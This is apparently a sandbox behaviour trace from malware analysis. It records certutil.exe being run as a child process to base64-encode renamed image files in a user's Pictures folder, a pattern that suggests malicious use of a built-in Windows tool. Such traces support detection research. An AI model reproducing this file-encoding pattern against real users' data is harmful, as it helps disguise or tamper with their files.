dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x18393dbbd70 [0296.214] CryptMsgUpdate (hCryptMsg=0x18393dbbd70, pbData=0x18393de3780, cbData=0xe23a, fFinal=1) returned 0 [0296.214] GetLastError () returned 0x8009310b [0296.214] CryptMsgClose (hCryptMsg=0x18393dbbd70) returned 1 [0296.214] GetFileAttributesExW (in: lpFileName="Cm2WieoPB7gN.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\cm2wieopb7gn.png.sister"), fInfoLevelId=0x0, lpFileInformation=0x695bb6f720 | out: lpFileInformation=0x695bb6f720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c00470, ftCreationTime.dwHighDateTime=0x1d5e3de, ftLastAccessTime.dwLowDateTime=0x7d12ada0, ftLastAccessTime.dwHighDateTime=0x1d5e8ad, ftLastWriteTime.dwLowDateTime=0x7d12ada0, ftLastWriteTime.dwHighDateTime=0x1d5e8ad, nFileSizeHigh=0x0, nFileSizeLow=0xe23a)) returned 1 [0296.214] _vsnwprintf (in: _Buffer=0x695bb6f728, _BufferCount=0xb, _Format="%d", _ArgList=0x695bb6f718 | out: _Buffer="359") returned 3 [0296.214] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x695bb6f4e0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0296.214] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x18393de3530 [0296.215] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.215] _vsnwprintf (in: _Buffer=0x695bb6e710, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x695bb6f768 | out: _Buffer="Input Length = 57914") returned 20 [0296.215] GetFileType (hFile=0x50) returned 0x2 [0296.215] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x695bb6e710*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x695bb6e6c4, lpReserved=0x0 | out: lpBuffer=0x695bb6e710*, lpNumberOfCharsWritten=0x695bb6e6c4*=0x14) returned 1 [0296.217] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.217] _vsnwprintf (in: _Buffer=0x695bb6e710, _BufferCount=0x1ff, _Format="\n", _ArgList=0x695bb6f768 | out: _Buffer="\n") returned 1 [0296.217] GetFileType (hFile=0x50) returned 0x2 [0296.217] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x695bb6e710*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x695bb6e6c4, lpReserved=0x0 | out: lpBuffer=0x695bb6e710*, lpNumberOfCharsWritten=0x695bb6e6c4*=0x1) returned 1 [0296.252] GetFileAttributesExW (in: lpFileName="Cm2WieoPB7gN.png.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\cm2wieopb7gn.png.cruel"), fInfoLevelId=0x0, lpFileInformation=0x695bb6f720 | out: lpFileInformation=0x695bb6f720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb2e59a5, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdb2e59a5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdb303f3b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1374a)) returned 1 [0296.252] _vsnwprintf (in: _Buffer=0x695bb6f728, _BufferCount=0xb, _Format="%d", _ArgList=0x695bb6f718 | out: _Buffer="361") returned 3 [0296.253] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x695bb6f4e0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0296.253] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x18393de3620 [0296.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.253] _vsnwprintf (in: _Buffer=0x695bb6e710, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x695bb6f768 | out: _Buffer="Output Length = 79690") returned 21 [0296.253] GetFileType (hFile=0x50) returned 0x2 [0296.253] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x695bb6e710*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x695bb6e6c4, lpReserved=0x0 | out: lpBuffer=0x695bb6e710*, lpNumberOfCharsWritten=0x695bb6e6c4*=0x15) returned 1 [0296.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.257] _vsnwprintf (in: _Buffer=0x695bb6e710, _BufferCount=0x1ff, _Format="\n", _ArgList=0x695bb6f768 | out: _Buffer="\n") returned 1 [0296.258] GetFileType (hFile=0x50) returned 0x2 [0296.258] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x695bb6e710*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x695bb6e6c4, lpReserved=0x0 | out: lpBuffer=0x695bb6e710*, lpNumberOfCharsWritten=0x695bb6e6c4*=0x1) returned 1 [0296.263] LocalFree (hMem=0x18393de3780) returned 0x0 [0296.263] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0296.263] _vsnwprintf (in: _Buffer=0x695bb6f788, _BufferCount=0xb, _Format="%d", _ArgList=0x695bb6f778 | out: _Buffer="2022") returned 4 [0296.263] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x695bb6f540, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0296.264] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x18393db8d20 [0296.264] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.264] _vsnwprintf (in: _Buffer=0x695bb6e770, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x695bb6f7c8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0296.264] GetFileType (hFile=0x50) returned 0x2 [0296.264] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x695bb6e770*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x695bb6e724, lpReserved=0x0 | out: lpBuffer=0x695bb6e770*, lpNumberOfCharsWritten=0x695bb6e724*=0x31) returned 1 [0296.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.265] _vsnwprintf (in: _Buffer=0x695bb6e770, _BufferCount=0x1ff, _Format="\n", _ArgList=0x695bb6f7c8 | out: _Buffer="\n") returned 1 [0296.265] GetFileType (hFile=0x50) returned 0x2 [0296.265] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x695bb6e770*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x695bb6e724, lpReserved=0x0 | out: lpBuffer=0x695bb6e770*, lpNumberOfCharsWritten=0x695bb6e724*=0x1) returned 1 [0296.269] LocalFree (hMem=0x0) returned 0x0 [0296.269] LocalFree (hMem=0x18393db4400) returned 0x0 [0296.269] LocalFree (hMem=0x18393dc4c00) returned 0x0 [0296.270] SetLastError (dwErrCode=0x80070716) [0296.270] _vsnwprintf (in: _Buffer=0x695bb6f7f8, _BufferCount=0xb, _Format="%d", _ArgList=0x695bb6f7e8 | out: _Buffer="511") returned 3 [0296.270] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x695bb6f5b0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0296.270] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x18393de3410 [0296.270] PostQuitMessage (nExitCode=0) [0296.270] GetMessageW (in: lpMsg=0x695bb6fdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x695bb6fdf0) returned 0 [0296.270] LocalFree (hMem=0x18393dcb820) returned 0x0 [0296.270] LocalFree (hMem=0x18393de33b0) returned 0x0 [0296.270] LocalFree (hMem=0x0) returned 0x0 [0296.271] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0296.271] GetLastError () returned 0x7e [0296.271] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0296.272] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0296.272] DllMain () returned 0x1 [0296.272] LocalFree (hMem=0x18393dcb380) returned 0x0 [0296.272] LocalFree (hMem=0x18393dd4bf0) returned 0x0 [0296.272] LocalFree (hMem=0x18393de3530) returned 0x0 [0296.272] LocalFree (hMem=0x18393de3620) returned 0x0 [0296.272] LocalFree (hMem=0x18393db8d20) returned 0x0 [0296.272] LocalFree (hMem=0x18393de3410) returned 0x0 [0296.272] LocalFree (hMem=0x18393dd53b0) returned 0x0 [0296.272] LocalFree (hMem=0x18393dd4e00) returned 0x0 [0296.273] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0296.273] GetLastError () returned 0x7e [0296.273] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0296.273] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0296.273] DllMain () returned 0x1 [0296.273] exit (_Code=0) Thread: id = 116 os_tid = 0xe18 Process: id = "45" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x182a2000" os_pid = "0x102c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 117 os_tid = 0xe10 [0296.716] GetStartupInfoW (in: lpStartupInfo=0xfcbba7fe00 | out: lpStartupInfo=0xfcbba7fe00*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0296.722] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0296.724] __set_app_type (_Type=0x1) [0296.725] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0296.725] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0296.728] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0296.728] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0296.729] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0296.729] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0296.729] WerSetFlags () returned 0x0 [0296.730] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0296.730] __iob_func () returned 0x7ffcea2dea00 [0296.730] _fileno (_File=0x7ffcea2dea30) returned 1 [0296.730] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0296.730] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0296.731] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0296.731] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0296.731] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0296.732] GetConsoleOutputCP () returned 0x1b5 [0296.733] _vsnwprintf (in: _Buffer=0xfcbba7fd70, _BufferCount=0xb, _Format=".%d", _ArgList=0xfcbba7fc98 | out: _Buffer=".437") returned 4 [0296.733] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0296.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.733] GetFileType (hFile=0x50) returned 0x2 [0296.734] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0296.734] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0296.734] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.734] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0296.734] GetCommandLineW () returned="certutil -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\"" [0296.735] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2dde9d4b730 [0296.735] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2dde9d3cde0 [0296.735] LocalFree (hMem=0x2dde9d4b730) returned 0x0 [0296.735] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2dde9d41ee0 [0296.735] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2dde9d42210 [0296.735] LocalFree (hMem=0x2dde9d41ee0) returned 0x0 [0296.735] LocalFree (hMem=0x2dde9d3cde0) returned 0x0 [0296.735] LocalFree (hMem=0x0) returned 0x0 [0296.735] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0296.735] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0296.736] GetCommandLineW () returned="certutil -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\"" [0296.736] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2dde9d4b590 [0296.736] GetSystemTime (in: lpSystemTime=0xfcbba7fa60 | out: lpSystemTime=0xfcbba7fa60*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xb, wMilliseconds=0x112)) [0296.736] SystemTimeToFileTime (in: lpSystemTime=0xfcbba7fa60, lpFileTime=0xfcbba7fa58 | out: lpFileTime=0xfcbba7fa58) returned 1 [0296.736] FileTimeToLocalFileTime (in: lpFileTime=0xfcbba7fa58, lpLocalFileTime=0xfcbba7fa20 | out: lpLocalFileTime=0xfcbba7fa20) returned 1 [0296.736] FileTimeToSystemTime (in: lpFileTime=0xfcbba7fa20, lpSystemTime=0xfcbba7f790 | out: lpSystemTime=0xfcbba7f790) returned 1 [0296.736] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xfcbba7f790, lpFormat=0x0, lpDateStr=0xfcbba7f8a0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0296.737] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xfcbba7f790, lpFormat=0x0, lpTimeStr=0xfcbba7f7a0, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0296.737] _vsnwprintf (in: _Buffer=0xfcbba7f7ae, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xfcbba7f778 | out: _Buffer=" 11.274s") returned 8 [0296.737] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2dde9d4e390 [0296.737] SetLastError (dwErrCode=0x80070716) [0296.737] _vsnwprintf (in: _Buffer=0xfcbba7f828, _BufferCount=0xb, _Format="%d", _ArgList=0xfcbba7f818 | out: _Buffer="948") returned 3 [0296.737] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xfcbba7f5e0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0296.737] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2dde9d4b5d0 [0296.737] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2dde9d44780 [0296.737] LocalFree (hMem=0x2dde9d4e390) returned 0x0 [0296.738] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xfcbba7fad0 | out: lpSystemTimeAsFileTime=0xfcbba7fad0*(dwLowDateTime=0xdb7a7e28, dwHighDateTime=0x1d6141f)) [0296.738] GetLocalTime (in: lpSystemTime=0xfcbba7fb08 | out: lpSystemTime=0xfcbba7fb08*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xb, wMilliseconds=0x116)) [0296.738] SystemTimeToFileTime (in: lpSystemTime=0xfcbba7fb08, lpFileTime=0xfcbba7fae0 | out: lpFileTime=0xfcbba7fae0) returned 1 [0296.738] CompareFileTime (lpFileTime1=0xfcbba7fae0, lpFileTime2=0xfcbba7fad0) returned 1 [0296.738] _vsnwprintf (in: _Buffer=0xfcbba7fb18, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xfcbba7faa8 | out: _Buffer="GMT + 2.00") returned 10 [0296.738] LocalFree (hMem=0x2dde9d4b590) returned 0x0 [0296.738] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0296.738] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0296.738] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0296.738] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0296.738] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0296.738] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xfcbba7fb48 | out: _Buffer="10.0.15063.447") returned 14 [0296.739] GetACP () returned 0x4e4 [0296.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0296.739] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2dde9d4bb30 [0296.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2dde9d4bb30, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0296.739] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2dde9d4e150 [0296.739] _vsnwprintf (in: _Buffer=0x2dde9d4e150, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfcbba7fb98 | out: _Buffer="10.0.15063.447 retail") returned 21 [0296.739] LocalFree (hMem=0x2dde9d4bb30) returned 0x0 [0296.739] LocalFree (hMem=0x0) returned 0x0 [0296.739] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0296.739] GetACP () returned 0x4e4 [0296.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0296.739] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2dde9d4b450 [0296.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2dde9d4b450, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0296.739] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2dde9d4e210 [0296.739] _vsnwprintf (in: _Buffer=0x2dde9d4e210, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfcbba7fb98 | out: _Buffer="10.0.15063.447 retail") returned 21 [0296.739] LocalFree (hMem=0x2dde9d4b450) returned 0x0 [0296.739] LocalFree (hMem=0x0) returned 0x0 [0296.740] GetACP () returned 0x4e4 [0296.740] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0296.740] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2dde9d4b730 [0296.740] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2dde9d4b730, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0296.740] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2dde9d4e050 [0296.740] _vsnwprintf (in: _Buffer=0x2dde9d4e050, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfcbba7fbc8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0296.740] LocalFree (hMem=0x2dde9d4b730) returned 0x0 [0296.740] LocalFree (hMem=0x2dde9d4e150) returned 0x0 [0296.740] LocalFree (hMem=0x2dde9d4e210) returned 0x0 [0296.740] LocalFree (hMem=0x2dde9d4e050) returned 0x0 [0296.740] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0296.740] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0296.741] GetStockObject (i=0) returned 0x900010 [0296.741] RegisterClassW (lpWndClass=0xfcbba7fcf0) returned 0xc1a2 [0296.741] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1702c6 [0296.763] NtdllDefWindowProc_W () returned 0x0 [0296.763] NtdllDefWindowProc_W () returned 0x1 [0296.786] NtdllDefWindowProc_W () returned 0x0 [0296.813] UpdateWindow (hWnd=0x1702c6) returned 1 [0296.813] PostMessageW (hWnd=0x1702c6, Msg=0x400, wParam=0x0, lParam=0x2dde9d3217e) returned 1 [0296.813] GetMessageW (in: lpMsg=0xfcbba7fd40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfcbba7fd40) returned 1 [0296.813] TranslateMessage (lpMsg=0xfcbba7fd40) returned 0 [0296.813] DispatchMessageW (lpMsg=0xfcbba7fd40) returned 0x0 [0296.813] NtdllDefWindowProc_W () returned 0x0 [0296.813] GetMessageW (in: lpMsg=0xfcbba7fd40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfcbba7fd40) returned 1 [0296.813] TranslateMessage (lpMsg=0xfcbba7fd40) returned 0 [0296.813] DispatchMessageW (lpMsg=0xfcbba7fd40) returned 0x0 [0296.813] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x2dde9d3f2d0 [0296.814] LocalAlloc (uFlags=0x0, uBytes=0x6e) returned 0x2dde9d343d0 [0296.814] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0296.814] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0296.814] SetLastError (dwErrCode=0x80070716) [0296.814] _vsnwprintf (in: _Buffer=0xfcbba7f748, _BufferCount=0xb, _Format="%d", _ArgList=0xfcbba7f738 | out: _Buffer="465") returned 3 [0296.814] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xfcbba7f500, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0296.814] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2dde9d41d60 [0296.814] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0296.814] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0296.814] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xfcbba7f4e0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0296.814] GetLastError () returned 0xcb [0296.815] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0296.815] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0296.815] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0296.815] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0296.815] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0296.815] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0296.815] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0296.815] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0296.815] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0296.815] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0296.815] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0296.815] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0296.815] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0296.815] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0296.815] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0296.815] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0296.815] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0296.816] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0296.816] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0296.816] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0296.816] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0296.816] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xfcbba7f1a8 | out: phkResult=0xfcbba7f1a8*=0x23c) returned 0x0 [0296.816] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2dde9d38940 [0296.816] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xfcbba7f718, lpData=0xfcbba7f748, lpcbData=0xfcbba7f710*=0x4 | out: lpType=0xfcbba7f718*=0x0, lpData=0xfcbba7f748*=0x0, lpcbData=0xfcbba7f710*=0x4) returned 0x2 [0296.816] LocalFree (hMem=0x2dde9d38940) returned 0x0 [0296.816] RegCloseKey (hKey=0x23c) returned 0x0 [0296.816] LocalFree (hMem=0x0) returned 0x0 [0296.816] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2dde9d5c600 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0296.838] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 